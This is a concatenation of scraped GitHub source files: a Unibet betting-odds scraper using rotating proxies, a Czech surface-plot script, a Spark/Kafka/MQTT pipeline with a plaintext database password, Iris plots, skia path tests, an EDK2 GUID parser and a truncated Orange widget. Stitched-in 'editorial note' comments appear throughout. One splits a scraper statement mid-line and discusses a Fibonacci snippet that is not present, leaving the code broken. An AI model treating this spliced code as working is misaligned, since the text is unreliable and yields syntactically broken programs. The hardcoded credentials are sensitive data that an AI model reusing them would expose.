Unibet:\r\n\r\n BOOKIE = 'Unibet'\r\n MAIN_URL = 'https://www.unibet.com'\r\n LIVE_URL = '='\r\n EXPAND_MODE = False\r\n USE_PROXY = 0\r\n WORKERS = 500\r\n SPECIALS = 'true'\r\n PRIMARY_ONLY = 'true'\r\n ALLOWED_SPORTS = [\r\n # 'Badminton',\r\n # 'Baseball',\r\n 'Basketball',\r\n # 'Boxing',\r\n # 'E Sports',\r\n 'Football',\r\n # 'Handball',\r\n # 'Hockey',\r\n # 'Rugby Union',\r\n # 'Snooker',\r\n # 'Soccer',\r\n # 'Tennis',\r\n # 'Volleyball'\r\n\r\n ]\r\n\r\n def __init__(self):\r\n self.proxies = asyncio.run(self.get_proxies())\r\n\r\n async def get_proxies(self):\r\n async with aiohttp.ClientSession() as session_:\r\n url = 'https://proxy.webshare.io/api/v2/proxy/list/' \\\r\n '?mode=direct' \\\r\n '&page=1' \\\r\n '&page_size=100,' \\\r\n '&country_code__in=IT,FR,ES'\r\n async with session_.get(\r\n url, headers={\"Authorization\": proxy_token}) as response:\r\n proxies = await response.json()\r\n return proxies.get('results')\r\n\r\n async def bound_live(self, sem, sport):\r\n url = f'https://spectate-web.888sport.com/spectate/sportsbook-req/getUpcomingEvents/{sport.lower()}/today'\r\n url = f'https://www.unibet.com/sportsbook-feeds/views/filter/{sport.lower()}/all/matches' \\\r\n '?includeParticipants=true&useCombined=true'\r\n len_proxy = len(self.proxies)\r\n choice_1 = random.randint(0, len_proxy - 1)\r\n proxy = f\"http://{self.proxies[choice_1]['proxy_address']}:{self.proxies[choice_1]['port']}\"\r\n prematch = []\r\n try:\r\n async with aiohttp.ClientSession() as session:\r\n async with session.get(url, proxy_auth=proxy_auth, proxy=proxy) as response:\r\n prematch = await response.json()\r\n except OSError as e:\r\n logging.info(f'{e}')\r\n try:\r\n if len(prematch) == 0:\r\n return\r\n except TypeError:\r\n return\r\n prematches_list = await self.get_matches_list(sem, prematch)\r\n return prematches_list\r\n\r\n async def random_proxy(self):\r\n proxies = [\r\n ]\r\n return random.choice(proxies)\r\n\r\n async def get_matches_list(self, sem, data):\r\n for section in data.get('layout', {}).get('sections'):\r\n if section.get('position') == 'MAIN':\r\n for widget in section.get('widgets'):\r\n if widget.get('widgetType') == \"TOURNAMENT\":\r\n groups = widget.get('matches', {}).get('groups', [])\r\n\r\n matches_list = []\r\n for group in groups:\r\n country = group.get('englishName')\r\n if group.get('subGroups') is None:\r\n continue\r\n for subgroup in group.get('subGroups', []):\r\n league = subgroup.get('englishName')\r\n for event in subgroup.get('events'):\r\n match_id = event.get('event', {}).get('id')\r\n match = 
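# --- editorial note (not part of the original Fibonacci snippet above) ---
# The snippet reads the count into `terms` but then tests `nterms`, which
# raises NameError; the check should be `if terms <= 0`. Separately, the
# naive recursion is exponential in n -- memoizing the same recurrence makes
# it linear:
from functools import lru_cache

@lru_cache(maxsize=None)
def fib(n):
    return n if n <= 1 else fib(n - 1) + fib(n - 2)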
event.get('event', {}).get('englishName')\r\n sport = event.get('event', {}).get('sport').lower().capitalize()\r\n kickoff = event.get('event', {}).get('start')\r\n # print(match_id, match, sport, kickoff, league, country)\r\n url = f'https://www.unibet.com/betting/sports/event/{match_id}'\r\n betAttribute = {\r\n 'info': {\r\n 'id': match_id,\r\n 'match': match,\r\n 'bookmaker': self.BOOKIE,\r\n 'league': league,\r\n 'country': country,\r\n # 'match_id': match_id,\r\n 'sport': sport,\r\n 'checking_time': time.ctime(),\r\n 'unix_time': int(time.time()),\r\n 'kickoff': int(datetime.fromisoformat(kickoff.replace('Z', '')).timestamp()) + 10800,\r\n 'url': url\r\n },\r\n }\r\n converted_m_list = []\r\n for bet_offer in event.get('betOffers', []):\r\n if bet_offer.get('suspended') is False:\r\n for bet in bet_offer.get('outcomes', []):\r\n scanner_format_bet = await self.convert_to_scanner_format(bet, bet_offer)\r\n if scanner_format_bet is False:\r\n continue\r\n converted_m_list.append(scanner_format_bet)\r\n betAttribute['converted_markets'] = converted_m_list\r\n matches_list.append(betAttribute)\r\n return matches_list\r\n\r\n async def convert_to_scanner_format(self, bet, whole_bet):\r\n if bet.get('status') == 'SUSPENDED':\r\n return False\r\n if whole_bet.get('criterion').get('englishLabel') == \"Full Time\":\r\n if bet['label'] in ['1', 'X', '2']:\r\n if len(whole_bet.get('outcomes', [])) == 3:\r\n type_name = '1X2'\r\n return await self.return_scanner_format(type_name, f\"{bet['label']}\", bet['odds'] / 1000)\r\n elif whole_bet.get('betOfferType').get('englishName') == \"Match\":\r\n type_name = '12'\r\n if bet.get('type') == 'OT_ONE':\r\n type_ = f\"1\"\r\n elif bet.get('type') == 'OT_TWO':\r\n type_ = f\"2\"\r\n return await self.return_scanner_format(type_name, type_, bet['odds'] / 1000)\r\n elif whole_bet.get('criterion').get('englishLabel') == \"Total Goals\":\r\n type_name = \"Totals\"\r\n line = str(bet.get('line') / 1000)\r\n type_ = bet.get('label', 'n')[:1]\r\n return await self.return_scanner_format(type_name, type_, bet['odds'] / 1000, line)\r\n elif whole_bet.get('criterion').get('englishLabel') in \\\r\n [\"Game Handicap\", \"Handicap\", 'Handicap - Including Overtime']:\r\n type_name = \"Handicap(OT)\"\r\n line = str(bet.get('line') / 1000)\r\n if bet.get('type') == 'OT_ONE':\r\n type_ = f\"H1\"\r\n elif bet.get('type') == 'OT_TWO':\r\n type_ = f\"H2\"\r\n return await self.return_scanner_format(type_name, type_, bet['odds'] / 1000, line)\r\n else:\r\n return False\r\n\r\n @staticmethod\r\n async def return_scanner_format(type_name: str, type_: str, odds: float, line='0.0') -> dict:\r\n scanner_format = {\r\n 'type_name': type_name,\r\n 'type': type_,\r\n 'line': line,\r\n 'odds': odds\r\n }\r\n return scanner_format\r\n\r\n async def get_matches(self):\r\n tasks = []\r\n sem = asyncio.Semaphore(self.WORKERS)\r\n for sport in self.ALLOWED_SPORTS:\r\n try:\r\n task = asyncio.ensure_future(self.bound_live(sem, sport))\r\n tasks.append(task)\r\n except Exception as e:\r\n print(e)\r\n responses = await asyncio.gather(*tasks)\r\n matches = []\r\n for matches_ in responses:\r\n matches += matches_\r\n logging.info(f\"{self.BOOKIE} has {len(matches)} events\")\r\n return matches\r\n\r\n\r\nif __name__ == '__main__':\r\n ps = Unibet()\r\n logging.info(f\"Start Unibet.com scraper...\")\r\n filename = '../cache/Unibet_cache.json'\r\n\r\n while True:\r\n try:\r\n date_ = datetime.today().strftime('%Y-%m-%d')\r\n loopf = asyncio.get_event_loop()\r\n future = 
asyncio.ensure_future(ps.get_matches())\r\n loopf.run_until_complete(future)\r\n with open(filename, 'w') as f:\r\n json.dump(future.result(), f, indent=4)\r\n sleep_time = 10\r\n logging.info(f\"{sleep_time} seconds sleep.\")\r\n time.sleep(sleep_time)\r\n except Exception as e:\r\n # raise e\r\n logging.error(f\"{e}\")\r\n time.sleep(120)\r\n","repo_name":"DoroninDobro/The_New_Great_Value","sub_path":"bookmakers/unibet_com.py","file_name":"unibet_com.py","file_ext":"py","file_size_in_byte":8711,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"7593976180","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 4 19:48:30 2021\r\n\r\n@author: Petr\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.optimize import curve_fit\r\nimport plotly.graph_objects as go\r\nfrom IPython.display import display, Latex\r\n\r\n\r\npotenc = np.loadtxt(\"C:\\\\Users\\\\Petr\\\\Desktop\\\\potenc_prak.txt\",delimiter = \"\\t\",skiprows=1, dtype=float)\r\npotenc1 = potenc[:,0]\r\npotenc2 = potenc[:,1]\r\nfor i in range(len(potenc1)):\r\n potenc1[i] = -potenc1[i]\r\n potenc2[i] = -potenc2[i]\r\nx = []\r\ny = []\r\nfor i in range(1,13):\r\n for j in range(1,13):\r\n x.append(i)\r\n y.append(j)\r\nx = np.array(x)\r\ny = np.array(y)\r\n\r\nx = np.reshape(x,(12,12))\r\ny = np.reshape(y,(12,12))\r\npotenc1 = np.reshape(potenc1,(12,12))\r\npotenc2 = np.reshape(potenc2,(12,12))\r\n\r\n\r\n\r\n\r\n\r\n\r\nfig = go.Figure(data=[go.Surface(z=potenc1, x=x, y=y)])\r\nfig.update_layout(title = \"Potenciál první konfigurace\",scene = dict(\r\n \r\n xaxis_title=\"x\",\r\n yaxis_title=\"y\",\r\n zaxis_title= \"φ\"))\r\n \r\nfig.write_html(\"potenc1.html\")\r\nfig = plt.figure(figsize =(15, 11))\r\nax = plt.axes(projection='3d')\r\nax.set_xlabel('x',size = 20,labelpad=20)\r\nax.set_ylabel('y',size = 20,labelpad=20)\r\nax.set_zlabel(\"$\\\\phi$\",size = 20,labelpad=10)\r\nax.zaxis.set_tick_params(labelsize=18)\r\nax.yaxis.set_tick_params(labelsize=18)\r\nax.xaxis.set_tick_params(labelsize=18)\r\nax.zaxis.set_rotate_label(False) \r\nsurf = ax.plot_surface(x, y, potenc1,edgecolor ='none', cmap='plasma', linewidth=1)\r\ncbar = fig.colorbar(surf,ax=ax, shrink=0.5, aspect=5)\r\ncbar.ax.tick_params(labelsize=18)\r\nplt.savefig(\"potenc1.eps\")\r\nfig2 = go.Figure(data=[go.Surface(z=potenc2, x=x, y=y)])\r\nfig2.update_layout(title = \"Potenciál druhé konfigurace\",scene = dict(\r\n \r\n xaxis_title=\"x\",\r\n yaxis_title=\"y\",\r\n zaxis_title= \"φ\"))\r\n \r\nfig2.write_html(\"potenc2.html\")\r\nfig2 = plt.figure(figsize =(15, 11))\r\nax2 = plt.axes(projection='3d')\r\nax2.set_xlabel('x',size = 20,labelpad=20)\r\nax2.set_ylabel('y',size = 20,labelpad=20)\r\nax2.set_zlabel(\"$\\\\phi$\",size = 20,labelpad=10)\r\nax2.zaxis.set_tick_params(labelsize=18)\r\nax2.yaxis.set_tick_params(labelsize=18)\r\nax2.xaxis.set_tick_params(labelsize=18)\r\nax2.zaxis.set_rotate_label(False) \r\nsurf2 = ax2.plot_surface(x, y, potenc2,edgecolor ='none', cmap='plasma', linewidth=1)\r\ncbar2 = fig2.colorbar(surf2,ax=ax2, shrink=0.5, aspect=5)\r\ncbar2.ax.tick_params(labelsize=18)\r\nplt.savefig(\"potenc2.eps\")","repo_name":"cervep12/python","sub_path":"3Dgraf.py","file_name":"3Dgraf.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40367136487","text":"import os\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions 
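# --- editorial notes on the Unibet scraper above (sketch, not original) ---
# 1) bound_live() accepts `sem` but never enters it, so the WORKERS semaphore
#    created in get_matches() does not actually bound concurrency. The usual
#    shape wraps the request coroutine:
import asyncio

async def bounded(sem, coro):
    async with sem:          # at most WORKERS coroutines pass this point
        return await coro

# 2) bound_live() returns None on its early-exit paths, so get_matches()'s
#    `matches += matches_` can raise TypeError; `matches += matches_ or []`
#    normalizes that.
# 3) In convert_to_scanner_format(), `type_` is only bound for OT_ONE/OT_TWO
#    outcomes; any other outcome type reaches the return and raises
#    UnboundLocalError. A dict lookup avoids the gap:
#    {"OT_ONE": "1", "OT_TWO": "2"}.get(bet.get("type"))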
import *\nimport time\nimport csv\nimport psycopg2\n#mqtt\nimport paho.mqtt.client as mqtt\nfrom pykafka import KafkaClient\n\nos.environ['PYSPARK_SUBMIT_ARGS'] = '--packages org.apache.spark:spark-sql-kafka-0-10_2.12:3.1.1 pyspark-shell'\n\nkafka_topic_name = \"test-topic\"\nkafka_bootstrap_servers = 'localhost:9092'\n#mqtt\nmqttBroker = \"mqtt.eclipseprojects.io\"\nclient = mqtt.Client(\"mqttbridge\")\nclient.connect(mqttBroker)\n\nkafka_client = KafkaClient(hosts='localhost:9092')\nkafka_topic = kafka_client.topics[b'test-topic']\nkafka_producer = kafka_topic.get_sync_producer()\n\nif __name__ == \"__main__\":\n print(\"Welcome!!!\")\n print(\"Stream Data Processing Application Started ...\")\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n spark = SparkSession \\\n .builder \\\n .appName(\"mm\") \\\n .config(\"spark.driver.extraClassPath\", \"/home/gharsallah/Downloads/postgresql-42.3.1.jar\") \\\n .master(\"local[*]\") \\\n .getOrCreate()\n\n spark.sparkContext.setLogLevel(\"ERROR\")\n\n # configure the PostgreSQL JDBC driver\n jdbc_url = \"jdbc:postgresql://localhost:5432/pfadata\"\n connection_properties = {\n \"user\": \"sara\",\n \"password\": \"saroura1\",\n \"driver\": \"org.postgresql.Driver\"\n }\n # Connect to PostgreSQL and truncate the tables\n conn = psycopg2.connect(\n host=\"localhost\",\n database=\"pfadata\",\n user=\"sara\",\n password=\"saroura1\"\n )\n cur = conn.cursor()\n cur.execute(\"TRUNCATE TABLE popular_station, popular_bikes, avg_duration, mqtt_msg;\")\n conn.commit()\n cur.close()\n\n\n # Construct a streaming DataFrame that reads from test-topic\n orders_df = spark \\\n .readStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", kafka_bootstrap_servers) \\\n .option(\"subscribe\", kafka_topic_name) \\\n .option(\"startingOffsets\", \"latest\") \\\n .load()\n\n # Define schema for incoming Kafka messages\n orders_schema = \"duration_sec STRING, start_time STRING, end_time STRING, \" \\\n \"start_station_id LONG, start_station_name STRING, start_station_latitude DOUBLE, \" \\\n \"start_station_longitude DOUBLE, end_station_id LONG, end_station_name STRING, \" \\\n \"end_station_latitude DOUBLE, end_station_longitude DOUBLE, bike_id STRING, user_type STRING\"\n\n # Parse incoming messages as JSON and apply the schema\n orders_df1 = orders_df.select(from_json(col(\"value\").cast(\"string\"), orders_schema).alias(\"data\"), \"timestamp\")\n orders_df1 = orders_df1.selectExpr(\"data.*\", \"timestamp\")\n\n\n\n\n # The most popular start and end stations\n popular_stations = orders_df1.groupBy(\"start_station_name\", \"end_station_name\") \\\n .count() \\\n .orderBy(desc(\"count\")) \\\n .limit(10)\n\n # The most frequently rented bikes\n popular_bikes = orders_df1.groupBy(\"bike_id\") \\\n .count() \\\n .orderBy(desc(\"count\")) \\\n .limit(10)\n\n # The average duration of a rental\n avg_duration = orders_df1.select(avg(\"duration_sec\").cast(\"FLOAT\").alias(\"avg_duration_sec\"))\n\n # Write results to PostgreSQL table\n def write_to_postgres_pop_sation(df, epoch_id):\n df.write.jdbc(url=jdbc_url, table=\"popular_station\", mode=\"append\", properties=connection_properties)\n def write_to_postgres_popular_bikes(df, epoch_id):\n df.write.jdbc(url=jdbc_url, table=\"popular_bikes\", mode=\"append\", properties=connection_properties)\n def write_to_postgres_avg_duration(df, epoch_id):\n df.write.jdbc(url=jdbc_url, table=\"avg_duration\", mode=\"append\", properties=connection_properties)\n\n # Start the write stream queries\n 
popular_stations_write_stream = popular_stations \\\n .writeStream \\\n .trigger(processingTime='2 seconds') \\\n .outputMode(\"complete\") \\\n .option(\"checkpointLocation\", \"/tmp/checkpoint1\") \\\n .foreachBatch(write_to_postgres_pop_sation) \\\n .start()\n\n popular_bikes_write_stream = popular_bikes \\\n .writeStream \\\n .trigger(processingTime='2 seconds') \\\n .outputMode(\"complete\") \\\n .option(\"checkpointLocation\", \"/tmp/checkpoint2\") \\\n .foreachBatch(write_to_postgres_popular_bikes) \\\n .start()\n avg_duration_write_stream = avg_duration \\\n .writeStream \\\n .trigger(processingTime='2 seconds') \\\n .outputMode(\"complete\") \\\n .option(\"checkpointLocation\", \"/tmp/checkpoint5\") \\\n .foreachBatch(write_to_postgres_avg_duration) \\\n .start()\n\n#mqtt\ndef insert_data(data):\n cur = conn.cursor()\n cur.execute(\"INSERT INTO mqtt_msg (msg) VALUES (%s)\", (data,))\n conn.commit()\n cur.close()\n\n\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected to MQTT broker\")\n client.subscribe(\"esp32\")\n\ndef on_message(client, userdata, msg):\n data = msg.payload.decode()\n print(data)\n insert_data(data)\n with open(\"/home/gharsallah/Downloads/es.csv\", \"a\") as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow([data])\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(\"test.mosquitto.org\", 1883, 60)\n\nclient.loop_forever()\n\nspark.streams.awaitAnyTermination()\n","repo_name":"mohamedgharsallah/Solution-iot-big-data-pour-la-gestion-de-flotte-de-velos","sub_path":"databasestore.py","file_name":"databasestore.py","file_ext":"py","file_size_in_byte":5306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"42453051383","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sb\n\n# Assign colum names to the dataset\nnames = ['Sepal.Length', 'Sepal.Width', 'Petal.Length', 'Petal.Width', 'Species']\n\nwith open(\"Gorthi Jaswanth - iris.csv\", 'r') as f:\n with open(\"updated_iris.csv\", 'w') as f1:\n next(f) # skip header line\n for line in f:\n f1.write(line)\n\n# Read dataset to pandas dataframe\ndataset = pd.read_csv(\"updated_iris.csv\", names=names)\n\nprint(dataset)\n# Histogram\nplt.figure(figsize=(10, 7))\nx = dataset[\"Petal.Length\"]\n\nplt.hist(x, bins=100, color=\"blue\")\nplt.title(\"Petal Length in cm\")\nplt.xlabel(\"Petal.Length\")\nplt.ylabel(\"Count\")\nplt.show()\n# --------------------------------------\n# Boxplot\nplt.figure(figsize=(10, 7))\ndataset.boxplot()\nplt.show()\n\n# --------------------------------------\n# ScatterPlot\nplt.scatter(dataset[\"Petal.Length\"], dataset[\"Petal.Width\"])\nplt.xlabel('Petal Length')\nplt.ylabel('Petal Width')\nplt.show()\n# Using Seaborn\n# Histogram\nsb.distplot(dataset[\"Sepal.Length\"], bins=100, kde=False, rug=True, color=\"green\")\nplt.show()\n# --------------------------------------\n# Boxplot\nsb.boxplot(x=dataset[\"Petal.Length\"], y=dataset[\"Species\"], data=dataset)\nplt.show()\n# --------------------------------------\n# ScatterPlot\nsb.scatterplot(x=dataset[\"Petal.Length\"], y=dataset[\"Sepal.Length\"], hue=\"Species\", data=dataset)\nplt.show()","repo_name":"jgorthi/kNN-Algorthim","sub_path":"kNN/Plots.py","file_name":"Plots.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"29135886149","text":"import math\nimport 
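# --- editorial sketch (not part of the original Spark job above) ---
# The three write_to_postgres_* callbacks differ only in their target table;
# a closure factory removes the duplication (jdbc_url and
# connection_properties as defined in that script):
def jdbc_writer(table, jdbc_url, connection_properties):
    def write(df, epoch_id):
        df.write.jdbc(url=jdbc_url, table=table, mode="append",
                      properties=connection_properties)
    return write

# usage: .foreachBatch(jdbc_writer("popular_station", jdbc_url, connection_properties))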
skia\nimport pytest\n\n\n@pytest.fixture\ndef path():\n return skia.Path()\n\n\ndef postan(path_measure, offset):\n postan = path_measure.getPosTan(offset)\n assert postan is not None\n return postan\n\n\ndef test_PathMeasure_init(path):\n assert isinstance(skia.PathMeasure(path, False), skia.PathMeasure)\n\n\ndef test_forceclosed(path):\n path.moveTo(0, 0)\n path.lineTo(1, 0)\n path.lineTo(1, 1)\n path.lineTo(0, 1)\n meas = skia.PathMeasure(path, True)\n assert meas.getLength() == 4\n\n\ndef test_345(path):\n path.moveTo(0, 0)\n path.lineTo(3, 4)\n meas = skia.PathMeasure(path, False)\n assert meas.getLength() == 5\n\n\ndef test_circle(path):\n path.addCircle(0, 0, 1)\n meas = skia.PathMeasure(path, False)\n # Test is also commented in skia/tests/PathMeasureTest.cpp\n # assert meas.getLength() == pytest.approx(2 * math.pi)\n\n\ndef test_close_without_move(path):\n path.lineTo(1, 0)\n path.lineTo(1, 1)\n path.lineTo(0, 1)\n path.close()\n path.lineTo(-1, 0)\n meas = skia.PathMeasure(path, False)\n assert meas.getLength() == 4\n meas.nextContour()\n assert meas.getLength() == 1\n (pos, tan) = postan(meas, 0.5)\n assert pos.x() == pytest.approx(-0.5)\n assert pos.y() == 0.0\n assert tan.x() == -1.0\n assert tan.y() == 0.0\n\n\ndef test_degenerate(path):\n path.moveTo(0, 0)\n path.lineTo(0, 0)\n path.lineTo(1, 0)\n path.quadTo(1, 0, 1, 0)\n path.quadTo(1, 1, 1, 1 * 2)\n path.cubicTo(1, 2, 1, 2, 1, 2)\n path.cubicTo(2, 2, 3, 2, 4, 2)\n meas = skia.PathMeasure(path, False)\n assert meas.getLength() == 6\n\n (pos, tan) = postan(meas, 0.5)\n assert pos.x() == pytest.approx(0.5)\n assert pos.y() == 0\n assert tan.x() == 1\n assert tan.y() == 0\n\n (pos, tan) = postan(meas, 2.5)\n assert pos.x() == pytest.approx(1.0)\n assert pos.y() == pytest.approx(1.5)\n assert tan.x() == 0\n assert tan.y() == 1\n\n (pos, tan) = postan(meas, 4.5)\n assert pos.x() == pytest.approx(2.5)\n assert pos.y() == pytest.approx(2.0)\n assert tan.x() == 1\n assert tan.y() == 0\n\n\ndef test_degenerate2(path):\n path.moveTo(0, 0)\n path.lineTo(1, 0)\n path.moveTo(1, 1)\n path.moveTo(2, 2)\n path.lineTo(1, 2)\n meas = skia.PathMeasure(path, False)\n assert meas.getLength() == 1\n (pos, tan) = postan(meas, 0.5)\n assert pos.x() == pytest.approx(0.5)\n assert pos.y() == 0\n assert tan.x() == 1\n assert tan.y() == 0\n\n meas.nextContour()\n assert meas.getLength() == 1\n (pos, tan) = postan(meas, 0.5)\n assert pos.x() == pytest.approx(1.5)\n assert pos.y() == pytest.approx(2.0)\n assert tan.x() == -1\n assert tan.y() == 0\n\n\ndef test_conic(path):\n pt = skia.Point(100, 0)\n path.moveTo(0, 0)\n path.conicTo(pt, pt, 1)\n meas = skia.PathMeasure(path, False)\n (stdP, tan) = postan(meas, 20)\n\n path.reset()\n path.moveTo(0, 0)\n path.conicTo(pt, pt, 10)\n meas.setPath(path, False)\n (hiP, tan) = postan(meas, 20)\n assert 19.5 < stdP.x() and stdP.x() < 20.5\n assert 19.5 < hiP.x() and hiP.x() < 20.5\n\n\n# Regression test for b/26425223\ndef test_nextctr(path):\n path.moveTo(0, 0)\n path.lineTo(100, 0)\n\n meas = skia.PathMeasure(path, False)\n # only expect 1 contour, even if we didn't explicitly call getLength() ourselves\n assert not meas.nextContour()\n","repo_name":"kyamagu/skia-python","sub_path":"tests/test_pathmeasure.py","file_name":"test_pathmeasure.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","stars":202,"dataset":"github-code","pt":"51"} +{"seq_id":"23395477339","text":"import re\nimport uuid\n\n\nclass GuidParser():\n \"\"\"Provide support functions for converting 
between different guid formats.\n\n Also support str uuid and uuid to string.\n\n Note:\n C-Format: {0xD3B36F2C, 0xD551, 0x11D4, {0x9A, 0x46, 0x00, 0x90, 0x27, 0x3F, 0xC1, 0x4D}}\n Reg-Format: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\n \"\"\"\n _HexChar = r\"[0-9a-fA-F]\"\n # Regular expression for GUID c structure format\n _GuidCFormatPattern = r\"{{\\s*0[xX]{Hex}{{1,8}}\\s*,\\s*0[xX]{Hex}{{1,4}}\\s*,\\s*0[xX]{Hex}{{1,4}}\" \\\n r\"\\s*,\\s*{{\\s*0[xX]{Hex}{{1,2}}\\s*,\\s*0[xX]{Hex}{{1,2}}\" \\\n r\"\\s*,\\s*0[xX]{Hex}{{1,2}}\\s*,\\s*0[xX]{Hex}{{1,2}}\" \\\n r\"\\s*,\\s*0[xX]{Hex}{{1,2}}\\s*,\\s*0[xX]{Hex}{{1,2}}\" \\\n r\"\\s*,\\s*0[xX]{Hex}{{1,2}}\\s*,\\s*0[xX]{Hex}{{1,2}}\\s*}}\\s*}}\".format(Hex=_HexChar)\n GuidCFormatRegEx = re.compile(r\"{}\".format(_GuidCFormatPattern))\n\n _GuidPattern = r\"{Hex}{{8}}-{Hex}{{4}}-{Hex}{{4}}-{Hex}{{4}}-{Hex}{{12}}\".format(Hex=_HexChar)\n\n # Regular expressions for GUID matching\n GuidRegFormatRegEx = re.compile(r'{}'.format(_GuidPattern))\n\n @classmethod\n def is_guid_in_c_format(cls, guidstring: str) -> bool:\n \"\"\"Determine if guidstring is in c format.\n\n Args:\n guidstring (str): string containing guid\n\n Returns:\n (bool): True if in C format. Otherwise False\n\n \"\"\"\n guidstring = guidstring.strip()\n return cls.GuidCFormatRegEx.match(guidstring)\n\n @classmethod\n def is_guid_in_reg_format(cls, guidstring: str) -> bool:\n \"\"\"Determine if guidstring is in registry format.\n\n Args:\n guidstring (str): string containing guid\n\n Returns:\n (bool): True if in Registry format. Otherwise False\n \"\"\"\n guidstring = guidstring.strip().strip('} {')\n return cls.GuidRegFormatRegEx.match(guidstring)\n\n @classmethod\n def reg_guid_from_c_format(cls, guidstring: str) -> str:\n \"\"\"Convert a c formatted guidstring to a registry formatted guidstring.\n\n Args:\n guidstring (str): c format guidstring\n\n Returns:\n (Success): guidstring in registry format\n (Failure): empty string ''\n \"\"\"\n guidstring = guidstring.strip()\n if not cls.is_guid_in_c_format(guidstring):\n return ''\n\n guidValueString = guidstring.lower().replace(\"{\", \"\").replace(\"}\", \"\").replace(\" \", \"\").replace(\";\", \"\")\n guidValueList = guidValueString.split(\",\")\n if len(guidValueList) != 11:\n return ''\n try:\n return \"%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x\" % (\n int(guidValueList[0], 16),\n int(guidValueList[1], 16),\n int(guidValueList[2], 16),\n int(guidValueList[3], 16),\n int(guidValueList[4], 16),\n int(guidValueList[5], 16),\n int(guidValueList[6], 16),\n int(guidValueList[7], 16),\n int(guidValueList[8], 16),\n int(guidValueList[9], 16),\n int(guidValueList[10], 16)\n )\n except Exception:\n return ''\n\n @classmethod\n def c_guid_from_reg_format(cls, guidstring: str) -> str:\n \"\"\"Convert registry format guidstring to c format guidstring.\n\n Args:\n guidstring (str): registry format guidstring\n\n Returns:\n (Success): guidstring in c format\n (Failure): empty string ''\n \"\"\"\n guidstring = guidstring.strip().strip('} {')\n if (not cls.is_guid_in_reg_format(guidstring)):\n return ''\n\n GuidList = guidstring.split('-')\n Result = '{'\n for Index in range(0, 3, 1):\n Result = Result + '0x' + GuidList[Index] + ', '\n Result = Result + '{0x' + GuidList[3][0:2] + ', 0x' + GuidList[3][2:4]\n for Index in range(0, 12, 2):\n Result = Result + ', 0x' + GuidList[4][Index:Index + 2]\n Result += '}}'\n return Result\n\n @classmethod\n def uuid_from_guidstring(cls, guidstring: str) -> uuid.UUID:\n \"\"\"Create a uuid object from the 
supplied guidstring.\"\"\"\n if (cls.is_guid_in_c_format(guidstring)):\n return uuid.UUID(cls.reg_guid_from_c_format(guidstring))\n elif (cls.is_guid_in_reg_format(guidstring)):\n guidstring = guidstring.strip().strip('} {')\n return uuid.UUID(guidstring)\n else:\n return None\n\n @classmethod\n def c_guid_str_from_uuid(cls, guid: uuid.UUID) -> str:\n \"\"\"Get a C string formatted guidstring from a uuid object.\n\n Args:\n guid (uuid.UUID): valid uuid object\n\n Returns:\n (Success): guidstring in C format\n (Failure): empty string ''\n \"\"\"\n reg = str(guid)\n return cls.c_guid_from_reg_format(reg)\n\n @classmethod\n def reg_guid_str_from_uuid(cls, guid: uuid.UUID) -> str:\n \"\"\"Get a registry string formatted guidstring from a uuid object.\n\n Args:\n guid (uuid.UUID): valid uuid object\n\n Returns:\n (Success): guidstring in registry format\n (Failure): empty string ''\n \"\"\"\n return str(guid)\n","repo_name":"tianocore/edk2-pytool-library","sub_path":"edk2toollib/uefi/edk2/parsers/guid_parser.py","file_name":"guid_parser.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"51"} +{"seq_id":"10087746061","text":"\"\"\"\nGene Info\nDisplays gene information from NCBI and other sources.\n2010\nAles Erjavec (ales.erjavec(@at@)fri.uni-lj.si)\nicons/GeneInfo.svg\n\"\"\"\n\nfrom __future__ import absolute_import, with_statement\n\nimport sys\nfrom collections import defaultdict\nfrom functools import partial\n\nfrom PyQt4.QtCore import pyqtSlot as Slot\n\nimport Orange\n\nfrom orangecontrib.bio.utils import serverfiles\nfrom Orange.utils import lru_cache\n\nfrom Orange.orng.orngDataCaching import data_hints\nfrom Orange.OrangeWidgets import OWGUI\nfrom Orange.OrangeWidgets.OWGUI import LinkStyledItemDelegate, LinkRole\n\nfrom Orange.OrangeWidgets.OWWidget import *\n\nfrom Orange.OrangeWidgets.OWConcurrent import \\\n ThreadExecutor, Task, methodinvoke\n\n\nfrom .. 
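# --- editorial sketch (not part of the original guid_parser module) ---
# Round-trip check using only the class methods above and the C-format
# example from the class docstring. Note that despite the `-> bool`
# annotations, the is_guid_in_* helpers actually return re.Match or None,
# which is merely truthy-compatible.
if __name__ == "__main__":
    c_fmt = "{0xD3B36F2C, 0xD551, 0x11D4, {0x9A, 0x46, 0x00, 0x90, 0x27, 0x3F, 0xC1, 0x4D}}"
    reg = GuidParser.reg_guid_from_c_format(c_fmt)
    assert reg == "d3b36f2c-d551-11d4-9a46-0090273fc14d"
    assert GuidParser.c_guid_from_reg_format(reg).startswith("{0xd3b36f2c")
    assert GuidParser.uuid_from_guidstring(reg) == GuidParser.uuid_from_guidstring(c_fmt)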
